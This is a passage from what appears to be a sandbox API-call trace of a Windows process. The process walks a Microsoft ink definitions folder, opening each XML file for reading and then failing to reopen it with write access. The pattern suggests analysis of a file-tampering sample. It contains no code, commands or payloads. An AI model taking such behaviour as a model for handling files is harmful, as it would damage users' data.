(dwErrCode=0x5) [0099.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85da0 | out: hHeap=0x20000) returned 1 [0099.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0099.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0099.615] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.615] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.615] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.616] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aeb0 [0099.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0099.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ced8 [0099.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.616] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xdb, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="osknumpad.xml", cAlternateFileName="")) returned 1 [0099.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0099.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0099.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0099.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0099.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cf80 [0099.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d0d0 [0099.616] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78110 [0099.616] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06ceb7f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a37a4cb, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0099.616] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3fbc74, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3fbc74, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x73d, dwReserved0=0x0, dwReserved1=0x0, cFileName="osknumpadbase.xml", cAlternateFileName="")) returned 1 [0099.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d0d0 | out: hHeap=0x20000) returned 1 [0099.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0099.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0099.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0099.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0099.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0099.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c458 [0099.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46048 [0099.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ced8 | out: hHeap=0x20000) returned 1 [0099.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0099.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0099.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0099.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0099.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0099.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0099.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0099.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0099.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0099.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d028 [0099.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0099.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xee) returned 0x4bb78 [0099.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d028 | out: hHeap=0x20000) returned 1 [0099.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0099.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x55f20 [0099.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4bb78 | out: hHeap=0x20000) returned 1 [0099.617] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.617] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.617] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.617] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0099.617] AreFileApisANSI () returned 1 [0099.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", lpUsedDefaultChar=0x0) returned 93 [0099.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0099.617] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.617] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0099.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0099.618] AreFileApisANSI () returned 1 [0099.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71bd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 93 [0099.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xba) returned 0x55f20 [0099.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71bd0, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=93 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml") returned 93 [0099.618] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0099.618] GetFileType (hFile=0x27c) returned 0x1 [0099.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.618] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.618] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.618] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.619] CloseHandle (hObject=0x27c) returned 1 [0099.619] AreFileApisANSI () returned 1 [0099.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71bd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 93 [0099.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xba) returned 0x55f20 [0099.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71bd0, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=93 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml") returned 93 [0099.619] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.619] GetLastError () returned 0x5 [0099.619] GetLastError () returned 0x5 [0099.619] SetLastError (dwErrCode=0x5) [0099.619] GetLastError () returned 0x5 [0099.619] SetLastError (dwErrCode=0x5) [0099.619] GetLastError () returned 0x5 [0099.619] SetLastError (dwErrCode=0x5) [0099.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0099.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0099.619] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.619] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.619] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0xb8, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x5a6c0, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0xb8, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧ܽ")) returned 0 [0099.620] FindClose (in: hFindFile=0x78110 | out: hFindFile=0x78110) returned 1 [0099.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0099.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0099.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0099.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0099.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c458 | out: hHeap=0x20000) returned 1 [0099.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0099.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cf80 | out: hHeap=0x20000) returned 1 [0099.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0099.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0099.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46048 | out: hHeap=0x20000) returned 1 [0099.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0099.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0099.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0099.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0099.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0099.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0099.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a238 [0099.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0099.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d0d0 [0099.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.620] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.620] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.620] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.620] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d0d0 | out: hHeap=0x20000) returned 1 [0099.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.621] AreFileApisANSI () returned 1 [0099.621] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml", lpUsedDefaultChar=0x0) returned 79 [0099.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0099.621] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.621] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0099.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0099.621] AreFileApisANSI () returned 1 [0099.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0099.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x8d0d0 [0099.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x8d0d0, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml") returned 79 [0099.621] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0099.621] GetFileType (hFile=0x418) returned 0x1 [0099.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d0d0 | out: hHeap=0x20000) returned 1 [0099.621] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.622] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.622] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.622] CloseHandle (hObject=0x418) returned 1 [0099.622] AreFileApisANSI () returned 1 [0099.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0099.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x8c5a8 [0099.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x8c5a8, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml") returned 79 [0099.622] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.622] GetLastError () returned 0x5 [0099.622] GetLastError () returned 0x5 [0099.622] SetLastError (dwErrCode=0x5) [0099.622] GetLastError () returned 0x5 [0099.622] SetLastError (dwErrCode=0x5) [0099.622] GetLastError () returned 0x5 [0099.622] SetLastError (dwErrCode=0x5) [0099.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c5a8 | out: hHeap=0x20000) returned 1 [0099.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0099.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0099.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0099.623] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.623] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.623] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cef41, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a37a4cb, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="oskpred", cAlternateFileName="")) returned 1 [0099.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0099.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0099.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0099.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0099.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0099.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0099.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0099.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cce0 [0099.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.623] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.623] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.623] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.623] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cce0 | out: hHeap=0x20000) returned 1 [0099.623] AreFileApisANSI () returned 1 [0099.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft 